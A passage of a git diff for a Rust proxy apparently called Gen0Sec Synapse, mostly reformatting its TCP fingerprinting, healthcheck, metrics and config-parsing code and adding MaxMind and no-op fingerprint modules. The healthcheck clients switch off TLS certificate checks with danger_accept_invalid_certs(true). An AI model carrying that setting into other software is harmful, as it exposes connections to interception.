packet_count, + self.config.min_packet_count, + src_ip, + src_port + ); skipped_count += 1; } } else { - log::debug!("Skipping IPv6 fingerprint entry with invalid size: key_len={}, value_len={}", key_bytes.len(), value_bytes.len()); + log::debug!( + "Skipping IPv6 fingerprint entry with invalid size: key_len={}, value_len={}", + key_bytes.len(), + value_bytes.len() + ); skipped_count += 1; } } - log::debug!("Found {} IPv6 TCP fingerprints, skipped {} entries", count, skipped_count); + log::debug!( + "Found {} IPv6 TCP fingerprints, skipped {} entries", + count, + skipped_count + ); } Err(e) => { log::warn!("Failed to read IPv6 TCP fingerprints: {}", e); @@ -720,7 +962,6 @@ impl TcpFingerprintCollector { Ok(()) } - /// Log current TCP fingerprint statistics pub fn log_stats(&self) -> Result<(), Box> { if !self.enabled { @@ -734,26 +975,48 @@ impl TcpFingerprintCollector { // Log detailed unique fingerprint information if stats.total_unique_fingerprints > 0 { // Group fingerprints by fingerprint string to show unique patterns - let mut fingerprint_groups: std::collections::HashMap> = std::collections::HashMap::new(); + let mut fingerprint_groups: std::collections::HashMap< + String, + Vec<&TcpFingerprintEntry>, + > = std::collections::HashMap::new(); for entry in &stats.fingerprints { - fingerprint_groups.entry(entry.key.fingerprint.clone()).or_insert_with(Vec::new).push(entry); + fingerprint_groups + .entry(entry.key.fingerprint.clone()) + .or_insert_with(Vec::new) + .push(entry); } - log::debug!("Unique fingerprint patterns: {} different patterns found", fingerprint_groups.len()); + log::debug!( + "Unique fingerprint patterns: {} different patterns found", + fingerprint_groups.len() + ); // Show top unique fingerprint patterns by total packet count - let mut pattern_stats: Vec<_> = fingerprint_groups.iter().map(|(pattern, entries)| { - let total_packets: u32 = entries.iter().map(|e| e.data.packet_count).sum(); - let unique_ips: std::collections::HashSet<_> = entries.iter().map(|e| &e.key.src_ip).collect(); - (pattern, total_packets, unique_ips.len(), entries.len()) - }).collect(); + let mut pattern_stats: Vec<_> = fingerprint_groups + .iter() + .map(|(pattern, entries)| { + let total_packets: u32 = + entries.iter().map(|e| e.data.packet_count).sum(); + let unique_ips: std::collections::HashSet<_> = + entries.iter().map(|e| &e.key.src_ip).collect(); + (pattern, total_packets, unique_ips.len(), entries.len()) + }) + .collect(); pattern_stats.sort_by(|a, b| b.1.cmp(&a.1)); // Sort by packet count log::debug!("Top unique fingerprint patterns:"); - for (i, (pattern, total_packets, unique_ips, entries)) in pattern_stats.iter().take(10).enumerate() { - log::debug!(" {}: {} ({} packets, {} unique IPs, {} entries)", - i + 1, pattern, total_packets, unique_ips, entries); + for (i, (pattern, total_packets, unique_ips, entries)) in + pattern_stats.iter().take(10).enumerate() + { + log::debug!( + " {}: {} ({} packets, {} unique IPs, {} entries)", + i + 1, + pattern, + total_packets, + unique_ips, + entries + ); } // Log as JSON for structured logging @@ -774,7 +1037,9 @@ impl TcpFingerprintCollector { } /// Get unique fingerprint statistics - pub fn get_unique_fingerprint_stats(&self) -> Result> { + pub fn get_unique_fingerprint_stats( + &self, + ) -> Result> { if !self.enabled { return Ok(UniqueFingerprintStats { timestamp: Utc::now(), @@ -788,18 +1053,24 @@ impl TcpFingerprintCollector { let stats = self.collect_aggregated_stats()?; // Group fingerprints by pattern - let mut fingerprint_groups: std::collections::HashMap> = std::collections::HashMap::new(); + let mut fingerprint_groups: std::collections::HashMap> = + std::collections::HashMap::new(); for entry in &stats.fingerprints { - fingerprint_groups.entry(entry.key.fingerprint.clone()).or_insert_with(Vec::new).push(entry); + fingerprint_groups + .entry(entry.key.fingerprint.clone()) + .or_insert_with(Vec::new) + .push(entry); } let mut patterns = Vec::new(); - let mut total_unique_ips: std::collections::HashSet<&String> = std::collections::HashSet::new(); + let mut total_unique_ips: std::collections::HashSet<&String> = + std::collections::HashSet::new(); let mut total_packets = 0u32; for (pattern, entries) in fingerprint_groups { let pattern_packets: u32 = entries.iter().map(|e| e.data.packet_count).sum(); - let pattern_ips: std::collections::HashSet<_> = entries.iter().map(|e| &e.key.src_ip).collect(); + let pattern_ips: std::collections::HashSet<_> = + entries.iter().map(|e| &e.key.src_ip).collect(); total_unique_ips.extend(pattern_ips.iter()); total_packets += pattern_packets; @@ -836,8 +1107,14 @@ impl TcpFingerprintCollector { if stats.total_unique_patterns > 0 { log::debug!("Top unique fingerprint patterns:"); for (i, pattern) in stats.patterns.iter().take(10).enumerate() { - log::debug!(" {}: {} ({} packets, {} unique IPs, {} entries)", - i + 1, pattern.pattern, pattern.packet_count, pattern.unique_ips, pattern.entries); + log::debug!( + " {}: {} ({} packets, {} unique IPs, {} entries)", + i + 1, + pattern.pattern, + pattern.packet_count, + pattern.unique_ips, + pattern.entries + ); } // Log as JSON for structured logging @@ -858,7 +1135,9 @@ impl TcpFingerprintCollector { } /// Collect TCP fingerprint events from all BPF skeletons - pub fn collect_fingerprint_events(&self) -> Result> { + pub fn collect_fingerprint_events( + &self, + ) -> Result> { if !self.enabled { return Ok(TcpFingerprintEvents { events: Vec::new(), @@ -886,7 +1165,7 @@ impl TcpFingerprintCollector { mss: entry.data.mss, window_size: entry.data.window_size, window_scale: entry.data.window_scale, - packet_count: entry.data.packet_count + packet_count: entry.data.packet_count, }; unique_ips.insert(event.src_ip.clone()); @@ -940,7 +1219,6 @@ impl TcpFingerprintCollector { Ok(()) } - /// Reset TCP fingerprint counters in BPF maps pub fn reset_fingerprint_counters(&self) -> Result<(), Box> { if !self.enabled { @@ -951,14 +1229,22 @@ impl TcpFingerprintCollector { for skel in &self.skels { // Reset TCP fingerprints map - match skel.maps.tcp_fingerprints.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + match skel.maps.tcp_fingerprints.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { Ok(batch_iter) => { let mut reset_count = 0; for (key_bytes, _) in batch_iter { if key_bytes.len() >= 20 { // Create zero value for fingerprint data (48 bytes with padding) let zero_value = vec![0u8; 48]; - if let Err(e) = skel.maps.tcp_fingerprints.update(&key_bytes, &zero_value, libbpf_rs::MapFlags::ANY) { + if let Err(e) = skel.maps.tcp_fingerprints.update( + &key_bytes, + &zero_value, + libbpf_rs::MapFlags::ANY, + ) { log::warn!("Failed to reset TCP fingerprint counter: {}", e); } else { reset_count += 1; @@ -975,7 +1261,11 @@ impl TcpFingerprintCollector { // Reset TCP SYN stats let key = 0u32.to_le_bytes(); let zero_stats = vec![0u8; 24]; // 3 * u64 = 24 bytes - if let Err(e) = skel.maps.tcp_syn_stats.update(&key, &zero_stats, libbpf_rs::MapFlags::ANY) { + if let Err(e) = + skel.maps + .tcp_syn_stats + .update(&key, &zero_stats, libbpf_rs::MapFlags::ANY) + { log::warn!("Failed to reset TCP SYN stats: {}", e); } else { log::debug!("Reset TCP SYN stats"); @@ -995,14 +1285,26 @@ impl TcpFingerprintCollector { log::debug!("Checking accessibility of BPF maps for skeleton {}", i); // Check tcp_fingerprints map - match skel.maps.tcp_fingerprints.lookup_batch(1, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + match skel.maps.tcp_fingerprints.lookup_batch( + 1, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { Ok(_) => log::debug!("tcp_fingerprints map is accessible for skeleton {}", i), - Err(e) => log::warn!("tcp_fingerprints map not accessible for skeleton {}: {}", i, e), + Err(e) => log::warn!( + "tcp_fingerprints map not accessible for skeleton {}: {}", + i, + e + ), } // Check tcp_syn_stats map let key = 0u32.to_le_bytes(); - match skel.maps.tcp_syn_stats.lookup(&key, libbpf_rs::MapFlags::ANY) { + match skel + .maps + .tcp_syn_stats + .lookup(&key, libbpf_rs::MapFlags::ANY) + { Ok(_) => log::debug!("tcp_syn_stats map is accessible for skeleton {}", i), Err(e) => log::warn!("tcp_syn_stats map not accessible for skeleton {}: {}", i, e), } @@ -1024,7 +1326,7 @@ impl Default for TcpFingerprintCollectorConfig { fn default() -> Self { Self { enabled: true, - log_interval_secs: 60, // Log stats every minute + log_interval_secs: 60, // Log stats every minute fingerprint_events_interval_secs: 30, // Send events every 30 seconds } } @@ -1032,7 +1334,11 @@ impl Default for TcpFingerprintCollectorConfig { impl TcpFingerprintCollectorConfig { /// Create a new configuration - pub fn new(enabled: bool, log_interval_secs: u64, fingerprint_events_interval_secs: u64) -> Self { + pub fn new( + enabled: bool, + log_interval_secs: u64, + fingerprint_events_interval_secs: u64, + ) -> Self { Self { enabled, log_interval_secs, @@ -1074,7 +1380,7 @@ mod tests { mss: 1460, window_size: 65535, window_scale: 7, - packet_count: 1 + packet_count: 1, }; let summary = event.summary(); diff --git a/src/utils/fingerprint/tcp_fingerprint_noop.rs b/src/utils/fingerprint/tcp_fingerprint_noop.rs new file mode 100644 index 0000000..4ce1dda --- /dev/null +++ b/src/utils/fingerprint/tcp_fingerprint_noop.rs @@ -0,0 +1,112 @@ +//! Noop TCP fingerprint module for non-BPF builds +//! +//! This module provides stub types when BPF is not enabled. + +use chrono::{DateTime, Utc}; +use std::net::IpAddr; +use std::sync::Arc; + +use crate::core::cli::TcpFingerprintConfig as TcpFingerprintCliConfig; + +/// Stub for TCP fingerprint data (no-op when BPF disabled) +#[derive(Debug, Clone, Default)] +pub struct TcpFingerprintData { + pub window_size: u16, + pub ttl: u16, + pub mss: u16, + pub window_scale: u8, + pub options: Vec, +} + +/// Stub for TCP fingerprint config (no-op when BPF disabled) +#[derive(Debug, Clone, Default)] +pub struct TcpFingerprintConfig { + pub enabled: bool, + pub log_interval_secs: u64, +} + +impl TcpFingerprintConfig { + pub fn new(enabled: bool, log_interval_secs: u64) -> Self { + Self { + enabled, + log_interval_secs, + } + } + + pub fn from_cli_config(cli_config: &TcpFingerprintCliConfig) -> Self { + Self { + enabled: cli_config.enabled, + log_interval_secs: cli_config.log_interval_secs, + } + } +} + +/// Stub for TCP fingerprint collector (no-op when BPF disabled) +#[derive(Clone)] +pub struct TcpFingerprintCollector { + config: TcpFingerprintConfig, +} + +impl TcpFingerprintCollector { + pub fn new( + _skels: Vec>>, + config: TcpFingerprintConfig, + ) -> Self { + Self { config } + } + + pub fn new_with_config( + _skels: Vec>>, + config: TcpFingerprintConfig, + ) -> Self { + Self { config } + } + + pub fn is_enabled(&self) -> bool { + self.config.enabled + } + + pub fn lookup_fingerprint(&self, _ip: IpAddr, _port: u16) -> Option { + None + } + + pub fn log_stats(&self) -> Result<(), Box> { + Ok(()) + } + + pub fn log_fingerprint_events(&self) -> Result<(), Box> { + Ok(()) + } +} + +/// Stub for TCP fingerprint event (no-op when BPF disabled) +#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)] +pub struct TcpFingerprintEvent { + pub event_type: String, + pub timestamp: DateTime, +} + +impl TcpFingerprintEvent { + pub fn new() -> Self { + Self { + event_type: "tcp_fingerprint".to_string(), + timestamp: Utc::now(), + } + } +} + +impl Default for TcpFingerprintEvent { + fn default() -> Self { + Self::new() + } +} + +/// Get global TCP fingerprint collector (no-op - always returns None) +pub fn get_global_tcp_fingerprint_collector() -> Option> { + None +} + +/// Set global TCP fingerprint collector (no-op) +pub fn set_global_tcp_fingerprint_collector(_collector: TcpFingerprintCollector) { + // No-op when BPF is disabled +} diff --git a/src/utils/healthcheck.rs b/src/utils/healthcheck.rs index 8419569..4f8c429 100644 --- a/src/utils/healthcheck.rs +++ b/src/utils/healthcheck.rs @@ -3,15 +3,24 @@ use crate::utils::tools::*; use dashmap::DashMap; use log::{error, warn}; use reqwest::{Client, Version}; -use std::sync::atomic::AtomicUsize; use std::sync::Arc; +use std::sync::atomic::AtomicUsize; use std::time::Duration; use tokio::time::interval; use tonic::transport::Endpoint; -pub async fn hc2(upslist: Arc, fullist: Arc, idlist: Arc, params: (&str, u64)) { +pub async fn hc2( + upslist: Arc, + fullist: Arc, + idlist: Arc, + params: (&str, u64), +) { let mut period = interval(Duration::from_secs(params.1)); - let client = Client::builder().timeout(Duration::from_secs(params.1)).danger_accept_invalid_certs(true).build().unwrap(); + let client = Client::builder() + .timeout(Duration::from_secs(params.1)) + .danger_accept_invalid_certs(true) + .build() + .unwrap(); loop { tokio::select! { _ = period.tick() => { @@ -21,7 +30,13 @@ pub async fn hc2(upslist: Arc, fullist: Arc, } } -pub async fn populate_upstreams(upslist: &Arc, fullist: &Arc, idlist: &Arc, params: (&str, u64), client: &Client) { +pub async fn populate_upstreams( + upslist: &Arc, + fullist: &Arc, + idlist: &Arc, + params: (&str, u64), + client: &Client, +) { let totest = build_upstreams(fullist, params.0, client).await; if !compare_dashmaps(&totest, upslist) { clone_dashmap_into(&totest, upslist); @@ -30,11 +45,19 @@ pub async fn populate_upstreams(upslist: &Arc, fullist: &Arc UpstreamsDashMap { - let client = Client::builder().timeout(Duration::from_secs(2)).danger_accept_invalid_certs(true).build().unwrap(); + let client = Client::builder() + .timeout(Duration::from_secs(2)) + .danger_accept_invalid_certs(true) + .build() + .unwrap(); build_upstreams(&fullist, "HEAD", &client).await } -async fn build_upstreams(fullist: &UpstreamsDashMap, method: &str, client: &Client) -> UpstreamsDashMap { +async fn build_upstreams( + fullist: &UpstreamsDashMap, + method: &str, + client: &Client, +) -> UpstreamsDashMap { let totest: UpstreamsDashMap = DashMap::new(); let fclone = clone_dashmap(fullist); for val in fclone.iter() { @@ -64,6 +87,11 @@ async fn build_upstreams(fullist: &UpstreamsDashMap, method: &str, client: &Clie rate_limit: upstream.rate_limit, healthcheck: upstream.healthcheck, disable_access_log: upstream.disable_access_log, + connection_timeout: upstream.connection_timeout, + read_timeout: upstream.read_timeout, + write_timeout: upstream.write_timeout, + idle_timeout: upstream.idle_timeout, + weight: upstream.weight, }; if scheme.healthcheck.unwrap_or(true) { @@ -99,10 +127,18 @@ async fn build_upstreams(fullist: &UpstreamsDashMap, method: &str, client: &Clie async fn http_request(url: &str, method: &str, payload: &str, client: &Client) -> (bool, bool) { if !["POST", "GET", "HEAD"].contains(&method) { - error!("Method {} not supported. Only GET|POST|HEAD are supported ", method); + error!( + "Method {} not supported. Only GET|POST|HEAD are supported ", + method + ); return (false, false); } - async fn send_request(client: &Client, method: &str, url: &str, payload: &str) -> Option { + async fn send_request( + client: &Client, + method: &str, + url: &str, + payload: &str, + ) -> Option { match method { "POST" => client.post(url).body(payload.to_owned()).send().await.ok(), "GET" => client.get(url).send().await.ok(), diff --git a/src/http_client.rs b/src/utils/http_client.rs similarity index 91% rename from src/http_client.rs rename to src/utils/http_client.rs index 23a8acc..7e72032 100644 --- a/src/http_client.rs +++ b/src/utils/http_client.rs @@ -1,7 +1,7 @@ +use anyhow::{Context, Result}; +use reqwest::Client; use std::sync::Arc; use std::time::Duration; -use reqwest::Client; -use anyhow::{Context, Result}; /// Shared HTTP client configuration with keepalive settings #[derive(Debug, Clone)] @@ -20,7 +20,7 @@ impl Default for HttpClientConfig { timeout: Duration::from_secs(30), connect_timeout: Duration::from_secs(10), keepalive_timeout: Duration::from_secs(60), // Keep connections alive for 60 seconds - max_idle_per_host: 10, // Allow up to 10 idle connections per host + max_idle_per_host: 10, // Allow up to 10 idle connections per host user_agent: format!("Synapse/{}", env!("CARGO_PKG_VERSION")), danger_accept_invalid_certs: false, } @@ -136,7 +136,10 @@ mod tests { assert_eq!(config.connect_timeout, Duration::from_secs(10)); assert_eq!(config.keepalive_timeout, Duration::from_secs(60)); assert_eq!(config.max_idle_per_host, 10); - assert_eq!(config.user_agent, format!("Synapse/{}", env!("CARGO_PKG_VERSION"))); + assert_eq!( + config.user_agent, + format!("Synapse/{}", env!("CARGO_PKG_VERSION")) + ); assert!(!config.danger_accept_invalid_certs); } @@ -144,12 +147,18 @@ mod tests { fn test_shared_http_client_creation() { let config = HttpClientConfig::default(); let client = SharedHttpClient::new(config).unwrap(); - assert_eq!(client.config().user_agent, format!("Synapse/{}", env!("CARGO_PKG_VERSION"))); + assert_eq!( + client.config().user_agent, + format!("Synapse/{}", env!("CARGO_PKG_VERSION")) + ); } #[test] fn test_shared_http_client_with_defaults() { let client = SharedHttpClient::with_defaults().unwrap(); - assert_eq!(client.config().user_agent, format!("Synapse/{}", env!("CARGO_PKG_VERSION"))); + assert_eq!( + client.config().user_agent, + format!("Synapse/{}", env!("CARGO_PKG_VERSION")) + ); } } diff --git a/src/utils/http_utils.rs b/src/utils/http_utils.rs index 3f26d3e..42f57b6 100644 --- a/src/utils/http_utils.rs +++ b/src/utils/http_utils.rs @@ -73,7 +73,9 @@ pub fn is_ip_in_cidr(ip: IpAddr, network: IpAddr, prefix_len: u8) -> bool { // Check remaining bits if remaining_bits > 0 && prefix_bytes < 16 { let mask = 0xFF << (8 - remaining_bits); - if (ip_bytes[prefix_bytes as usize] & mask) != (net_bytes[prefix_bytes as usize] & mask) { + if (ip_bytes[prefix_bytes as usize] & mask) + != (net_bytes[prefix_bytes as usize] & mask) + { return false; } } @@ -83,4 +85,3 @@ pub fn is_ip_in_cidr(ip: IpAddr, network: IpAddr, prefix_len: u8) -> bool { _ => false, // Different IP versions } } - diff --git a/src/utils/maxmind.rs b/src/utils/maxmind.rs new file mode 100644 index 0000000..8d941ab --- /dev/null +++ b/src/utils/maxmind.rs @@ -0,0 +1,113 @@ +use std::fs::File; +use std::path::PathBuf; +use std::sync::Arc; + +use anyhow::{Context, Result}; +use maxminddb::Reader; +use memmap2::MmapOptions; +use tokio::sync::RwLock; + +/// MaxMind database reader wrapper with memory-mapped file access +pub struct MaxMindReader { + reader: Arc>, +} + +impl MaxMindReader { + /// Open a MaxMind database from a file path + /// If path is a directory, appends the default filename + pub async fn open(path: PathBuf, default_filename: Option<&str>) -> Result { + let mut file_path = path.clone(); + + // If the path doesn't have a file extension, treat it as a directory and append the filename + if file_path.extension().is_none() { + if let Some(filename) = default_filename { + file_path = file_path.join(filename); + } + } + + // Use spawn_blocking since file operations are blocking + let reader = tokio::task::spawn_blocking({ + let path = file_path.clone(); + move || -> Result> { + let file = File::open(&path) + .with_context(|| format!("Failed to open MMDB file {:?}", path))?; + let mmap = unsafe { + MmapOptions::new() + .map(&file) + .with_context(|| format!("Failed to memory-map MMDB from {:?}", path))? + }; + Reader::from_source(mmap) + .with_context(|| format!("Failed to parse MMDB from {:?}", path)) + } + }) + .await + .context("Failed to spawn blocking task for MMDB open")??; + + log::info!("MMDB opened (memory-mapped) from {:?}", file_path); + + Ok(Self { + reader: Arc::new(reader), + }) + } + + /// Get a reference to the underlying reader + pub fn reader(&self) -> &Reader { + &self.reader + } + + /// Clone the reader Arc + pub fn clone_reader(&self) -> Arc> { + self.reader.clone() + } +} + +/// Thread-safe MaxMind database manager with refresh capability +pub struct MaxMindManager { + path: Option, + default_filename: Option, + reader: RwLock>>>, +} + +impl MaxMindManager { + /// Create a new MaxMind manager + pub fn new(path: Option, default_filename: Option<&str>) -> Self { + Self { + path, + default_filename: default_filename.map(|s| s.to_string()), + reader: RwLock::new(None), + } + } + + /// Refresh/reload the database reader + pub async fn refresh(&self) -> Result>> { + let path = self + .path + .clone() + .ok_or_else(|| anyhow::anyhow!("MMDB path not configured"))?; + + let reader = MaxMindReader::open(path, self.default_filename.as_deref()).await?; + let reader_arc = reader.clone_reader(); + + let mut guard = self.reader.write().await; + *guard = Some(reader_arc.clone()); + + Ok(reader_arc) + } + + /// Ensure the reader is loaded, refreshing if necessary + pub async fn ensure_reader(&self) -> Result>> { + { + let guard = self.reader.read().await; + if let Some(existing) = guard.as_ref() { + return Ok(existing.clone()); + } + } + self.refresh().await + } + + /// Get the reader if available, or None if not loaded + pub async fn get_reader(&self) -> Option>> { + let guard = self.reader.read().await; + guard.clone() + } +} diff --git a/src/utils/metrics.rs b/src/utils/metrics.rs index 37f8d6c..0a66031 100644 --- a/src/utils/metrics.rs +++ b/src/utils/metrics.rs @@ -1,7 +1,10 @@ +use once_cell::sync::Lazy; use pingora_http::Version; -use prometheus::{register_histogram, register_int_counter, register_int_counter_vec, Histogram, IntCounter, IntCounterVec}; +use prometheus::{ + Histogram, IntCounter, IntCounterVec, register_histogram, register_int_counter, + register_int_counter_vec, +}; use std::time::Duration; -use once_cell::sync::Lazy; pub struct MetricTypes { pub method: String, @@ -14,7 +17,8 @@ pub static REQUEST_COUNT: Lazy = Lazy::new(|| { register_int_counter!( "synapse_requests_total", "Total number of requests handled by Gen0Sec Synapse" - ).unwrap() + ) + .unwrap() }); pub static RESPONSE_CODES: Lazy = Lazy::new(|| { @@ -22,7 +26,8 @@ pub static RESPONSE_CODES: Lazy = Lazy::new(|| { "synapse_responses_total", "Responses grouped by status code by Gen0Sec Synapse", &["status"] - ).unwrap() + ) + .unwrap() }); pub static REQUEST_LATENCY: Lazy = Lazy::new(|| { @@ -30,7 +35,8 @@ pub static REQUEST_LATENCY: Lazy = Lazy::new(|| { "synapse_request_latency_seconds", "Request latency in seconds by Gen0Sec Synapse", vec![0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0] - ).unwrap() + ) + .unwrap() }); pub static RESPONSE_LATENCY: Lazy = Lazy::new(|| { @@ -38,7 +44,8 @@ pub static RESPONSE_LATENCY: Lazy = Lazy::new(|| { "synapse_response_latency_seconds", "Response latency in seconds by Gen0Sec Synapse", vec![0.01, 0.05, 0.1, 0.25, 0.5, 1.0, 2.0, 5.0] - ).unwrap() + ) + .unwrap() }); pub static REQUESTS_BY_METHOD: Lazy = Lazy::new(|| { @@ -46,7 +53,8 @@ pub static REQUESTS_BY_METHOD: Lazy = Lazy::new(|| { "synapse_requests_by_method_total", "Number of requests by HTTP method by Gen0Sec Synapse", &["method"] - ).unwrap() + ) + .unwrap() }); pub static REQUESTS_BY_VERSION: Lazy = Lazy::new(|| { @@ -54,14 +62,16 @@ pub static REQUESTS_BY_VERSION: Lazy = Lazy::new(|| { "synapse_requests_by_version_total", "Number of requests by HTTP versions by Gen0Sec Synapse", &["version"] - ).unwrap() + ) + .unwrap() }); pub static ERROR_COUNT: Lazy = Lazy::new(|| { register_int_counter!( "synapse_errors_total", "Total number of errors by Gen0Sec Synapse" - ).unwrap() + ) + .unwrap() }); pub fn calc_metrics(metric_types: &MetricTypes) { @@ -77,7 +87,11 @@ pub fn calc_metrics(metric_types: &MetricTypes) { _ => "Unknown", }; REQUESTS_BY_VERSION.with_label_values(&[&version_str]).inc(); - RESPONSE_CODES.with_label_values(&[&metric_types.code.to_string()]).inc(); - REQUESTS_BY_METHOD.with_label_values(&[&metric_types.method]).inc(); + RESPONSE_CODES + .with_label_values(&[&metric_types.code.to_string()]) + .inc(); + REQUESTS_BY_METHOD + .with_label_values(&[&metric_types.method]) + .inc(); RESPONSE_LATENCY.observe(metric_types.latency.as_secs_f64()); } diff --git a/src/utils.rs b/src/utils/mod.rs similarity index 60% rename from src/utils.rs rename to src/utils/mod.rs index b77e967..4785fc7 100644 --- a/src/utils.rs +++ b/src/utils/mod.rs @@ -1,12 +1,15 @@ #[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] pub mod bpf_utils; #[cfg(any(not(feature = "bpf"), feature = "disable-bpf"))] -#[path = "utils/bpf_utils_noop.rs"] +#[path = "bpf_utils_noop.rs"] pub mod bpf_utils; pub mod discovery; mod filewatch; +pub mod fingerprint; pub mod healthcheck; +pub mod http_client; pub mod http_utils; +pub mod maxmind; pub mod metrics; pub mod parceyaml; pub mod state; @@ -15,8 +18,3 @@ pub mod tls; pub mod tls_client_hello; pub mod tls_fingerprint; pub mod tools; -#[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] -pub mod tcp_fingerprint; -#[cfg(any(not(feature = "bpf"), feature = "disable-bpf"))] -#[path = "utils/tcp_fingerprint_noop.rs"] -pub mod tcp_fingerprint; diff --git a/src/utils/parceyaml.rs b/src/utils/parceyaml.rs index 539c069..815495e 100644 --- a/src/utils/parceyaml.rs +++ b/src/utils/parceyaml.rs @@ -9,6 +9,49 @@ use std::sync::atomic::AtomicUsize; use std::{env, fs}; // use tokio::sync::oneshot::{Receiver, Sender}; +/// Initialize default internal_paths - built-in internal service endpoints +/// These are always available and redirect to internal services +fn initialize_default_internal_paths(config: &mut Configuration) { + // Default paths that are always available + // These can be overridden by configuration if needed + + // Health check endpoint - typically points to internal health service + if !config.internal_paths.contains_key("/health") { + config + .internal_paths + .insert("/health".to_string(), (Vec::new(), AtomicUsize::new(0))); + info!("Initialized default internal_path: /health (can be configured to override)"); + } + + // ACME challenge endpoint - for Let's Encrypt certificate validation + if !config + .internal_paths + .contains_key("/.well-known/acme-challenge/*") + { + config.internal_paths.insert( + "/.well-known/acme-challenge/*".to_string(), + (Vec::new(), AtomicUsize::new(0)), + ); + info!( + "Initialized default internal_path: /.well-known/acme-challenge/* (can be configured to override)" + ); + } + + // Captcha verification endpoint - for internal captcha service + if !config + .internal_paths + .contains_key("/cgi-bin/captcha/verify") + { + config.internal_paths.insert( + "/cgi-bin/captcha/verify".to_string(), + (Vec::new(), AtomicUsize::new(0)), + ); + info!( + "Initialized default internal_path: /cgi-bin/captcha/verify (can be configured to override)" + ); + } +} + pub async fn load_configuration(d: &str, kind: &str) -> Option { let yaml_data = match kind { "filepath" => match fs::read_to_string(d) { @@ -32,13 +75,28 @@ pub async fn load_configuration(d: &str, kind: &str) -> Option { } }; - let parsed: Config = match serde_yaml::from_str(&yaml_data) { + let mut unused = Vec::new(); + let deserializer = serde_yaml::Deserializer::from_str(&yaml_data); + let parsed: Config = match serde_ignored::deserialize(deserializer, |path| { + unused.push(path.to_string()); + }) { Ok(cfg) => cfg, Err(e) => { - error!("Failed to parse upstreams file: {}", e); + error!( + "Failed to parse upstreams YAML (kind='{}', source='{}'): {}", + kind, d, e + ); return None; } }; + if !unused.is_empty() { + warn!( + "Unused upstreams config options (kind='{}', source='{}'): {}", + kind, + d, + unused.join(", ") + ); + } let mut toreturn = Configuration::default(); @@ -73,17 +131,34 @@ async fn populate_headers_and_auth(config: &mut Configuration, parsed: &Config) config.extraparams.https_proxy_enabled = Some(global_config.https_proxy_enabled); config.extraparams.rate_limit = global_config.global_rate_limit; - if let Some(headers) = &global_config.global_headers { + // Parse global_request_headers (headers to add to upstream requests) + if let Some(headers) = &global_config.global_request_headers { let mut hl = Vec::new(); for header in headers { if let Some((key, val)) = header.split_once(':') { hl.push((key.trim().to_string(), val.trim().to_string())); } } + config.global_request_headers = hl; + info!( + "Applied {} global request headers", + config.global_request_headers.len() + ); + } - let global_headers = DashMap::new(); - global_headers.insert("/".to_string(), hl); - config.headers.insert("GLOBAL_HEADERS".to_string(), global_headers); + // Parse global_response_headers (headers to add to responses) + if let Some(headers) = &global_config.global_response_headers { + let mut hl = Vec::new(); + for header in headers { + if let Some((key, val)) = header.split_once(':') { + hl.push((key.trim().to_string(), val.trim().to_string())); + } + } + config.global_response_headers = hl; + info!( + "Applied {} global response headers", + config.global_response_headers.len() + ); } if let Some(rate) = &global_config.global_rate_limit { @@ -95,6 +170,7 @@ async fn populate_headers_and_auth(config: &mut Configuration, parsed: &Config) config.healthcheck_method = global_config.healthcheck_method.clone(); } else { // Fallback to old format (top-level fields) + // Old format: treat all headers as both request and response headers for backward compatibility if let Some(headers) = &parsed.headers { let mut hl = Vec::new(); for header in headers { @@ -102,10 +178,12 @@ async fn populate_headers_and_auth(config: &mut Configuration, parsed: &Config) hl.push((key.trim().to_string(), val.trim().to_string())); } } - - let global_headers = DashMap::new(); - global_headers.insert("/".to_string(), hl); - config.headers.insert("GLOBAL_HEADERS".to_string(), global_headers); + // For backward compatibility, apply old global_headers to both request and response + config.global_request_headers = hl.clone(); + config.global_response_headers = hl; + info!( + "Applied legacy global headers to both request and response (for backward compatibility)" + ); } config.extraparams.sticky_sessions = parsed.sticky_sessions; @@ -120,20 +198,37 @@ async fn populate_headers_and_auth(config: &mut Configuration, parsed: &Config) if let Some(auth) = &parsed.authorization { let name = auth.get("type").unwrap_or(&"".to_string()).to_string(); let creds = auth.get("creds").unwrap_or(&"".to_string()).to_string(); - config.extraparams.authentication.insert("authorization".to_string(), vec![name, creds]); + config + .extraparams + .authentication + .insert("authorization".to_string(), vec![name, creds]); } else { config.extraparams.authentication = DashMap::new(); } } async fn populate_file_upstreams(config: &mut Configuration, parsed: &Config) { - // Handle arxignis_paths first - these are global paths that work across all hostnames - if let Some(arxignis_paths) = &parsed.arxignis_paths { - info!("Processing {} Arxignis paths", arxignis_paths.len()); - for (path, path_config) in arxignis_paths { + // Initialize default internal_paths - these are built-in internal service endpoints + // that are always available and redirect to internal services + initialize_default_internal_paths(config); + + // Handle configured internal_paths - these can override or extend the defaults + if let Some(internal_paths) = &parsed.internal_paths { + info!( + "Processing {} configured internal paths", + internal_paths.len() + ); + for (path, path_config) in internal_paths { let mut server_list = Vec::new(); - for server in &path_config.servers { - if let Some((ip, port_str)) = server.split_once(':') { + for server_config in &path_config.servers { + let (server_addr, weight) = match server_config { + crate::utils::structs::ServerConfig::String(addr) => (addr.clone(), 1), + crate::utils::structs::ServerConfig::Object { address, weight } => { + (address.clone(), *weight) + } + }; + + if let Some((ip, port_str)) = server_addr.split_once(':') { if let Ok(port) = port_str.parse::() { let https_proxy_enabled = path_config.https_proxy_enabled.unwrap_or(false); let ssl_enabled = path_config.ssl_enabled.unwrap_or(true); @@ -148,12 +243,24 @@ async fn populate_file_upstreams(config: &mut Configuration, parsed: &Config) { rate_limit: path_config.rate_limit, healthcheck: path_config.healthcheck, disable_access_log, + connection_timeout: path_config.connection_timeout, + read_timeout: path_config.read_timeout, + write_timeout: path_config.write_timeout, + idle_timeout: path_config.idle_timeout, + weight, }); } } } - config.arxignis_paths.insert(path.clone(), (server_list, AtomicUsize::new(0))); - info!("Arxignis path {} -> {} backend(s)", path, config.arxignis_paths.get(path).unwrap().0.len()); + // Override or add configured paths (will replace defaults if path matches) + config + .internal_paths + .insert(path.clone(), (server_list, 